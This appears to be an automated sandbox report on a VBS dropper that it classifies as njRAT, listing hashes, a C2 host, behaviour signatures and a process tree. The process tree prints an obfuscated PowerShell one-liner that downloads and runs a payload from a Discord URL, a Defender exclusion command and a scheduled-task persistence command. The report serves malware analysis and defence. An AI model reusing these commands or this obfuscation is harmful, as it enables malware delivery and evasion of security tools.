Overview

overview

10

Static

static

Shipment#4...45.vbs

windows7_x64

10

Shipment#4...45.vbs

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29-10-2021 18:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Shipment#45523666245.vbs

  • Size

    15KB

  • MD5

    b671f9ee1edb1e6f2911c22c4e6ebbaf

  • SHA1

    6de6dfee5b87a8f52ce34bc0c9d147bc69faa04e

  • SHA256

    313bb9d87b5bbdc4cc164ee429b41bcac1605401e1c3e7fa8d1fa287277e3cce

  • SHA512

    15f4ed29c203cf9a2da50b5df6d898e79feb08cf9ddc0ab7c315eeab9038745743e5352dc2db5197c3bf3817d26590bf4adc21a91a68fd2dcd633e3712fa4832

Score
10/10
njrat------(meilller)------trojan

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

------(MEILLLER)------

C2

new.libya2020.com.ly:2020

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipment#45523666245.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/903219380505169933/903220062633209916/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Users\Public\update.exe
        "C:\Users\Public\update.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\update.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3736
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrAhvaHxqGKf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA46A.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:2952
        • C:\Users\Public\update.exe
          "C:\Users\Public\update.exe"
          4⤵
          • Executes dropped EXE
          • Drops startup file
          PID:1572
  • C:\Users\Public\update.exe
    C:\Users\Public\update.exe
    1⤵
    • Executes dropped EXE
    PID:3740

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\update.exe.log
    MD5

    0c2899d7c6746f42d5bbe088c777f94c

    SHA1

    622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

    SHA256

    5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

    SHA512

    ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    b46561c25ef0fb853958cb1743a44dee

    SHA1

    3d2a202ad3e49fd6056885d629baa1207c54aa73

    SHA256

    bcac29045f0b0395f1696aaa9538667d996592b710a59767c0a00ccd8e3c4c12

    SHA512

    7ccc85ffd91d8c7b1f48443cb9c31c185c538dca7c62786d55939e7128db0543d234c97d2077428bb106cf37e0248bec9a405abff7fcebdde74c7dabbaaad80d

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • memory/1572-431-0x0000000005D00000-0x0000000005D01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1572-176-0x00000000004083AE-mapping.dmp
    Download
  • memory/1572-174-0x0000000000400000-0x000000000040E000-memory.dmp
    Filesize

    56KB

    Download
  • memory/1628-168-0x0000000007C60000-0x000000000815E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/1628-170-0x0000000009900000-0x0000000009901000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1628-169-0x0000000008100000-0x0000000008106000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1628-171-0x0000000009890000-0x00000000098B8000-memory.dmp
    Filesize

    160KB

    Download
  • memory/1628-167-0x0000000007EC0000-0x0000000007EC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1628-166-0x0000000007D40000-0x0000000007D41000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1628-165-0x0000000008160000-0x0000000008161000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1628-163-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1628-159-0x0000000000000000-mapping.dmp
    Download
  • memory/2952-173-0x0000000000000000-mapping.dmp
    Download
  • memory/3656-128-0x0000019142040000-0x0000019142041000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3656-119-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-150-0x0000019140068000-0x000001914006A000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-133-0x0000019140066000-0x0000019140068000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-129-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-115-0x0000000000000000-mapping.dmp
    Download
  • memory/3656-127-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-126-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-125-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-124-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-116-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-123-0x0000019140063000-0x0000019140065000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-122-0x0000019140060000-0x0000019140062000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-117-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-121-0x000001913FEB0000-0x000001913FEB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3656-120-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-118-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3656-161-0x0000019125FB0000-0x0000019125FB2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3736-192-0x0000000008360000-0x0000000008361000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-188-0x00000000080D0000-0x00000000080D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-181-0x0000000007A00000-0x0000000007A01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-185-0x0000000008030000-0x0000000008031000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-193-0x00000000089D0000-0x00000000089D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-189-0x0000000008390000-0x0000000008391000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-190-0x00000000084A0000-0x00000000084A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-194-0x0000000008B00000-0x0000000008B01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-186-0x00000000073C2000-0x00000000073C3000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-184-0x00000000073C0000-0x00000000073C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-179-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-230-0x000000007F740000-0x000000007F741000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-231-0x00000000073C3000-0x00000000073C4000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-177-0x0000000004E00000-0x0000000004E01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-175-0x0000000004E00000-0x0000000004E01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3736-172-0x0000000000000000-mapping.dmp
    Download
  • memory/3740-442-0x0000000007B90000-0x000000000808E000-memory.dmp
    Filesize

    5.0MB

    Download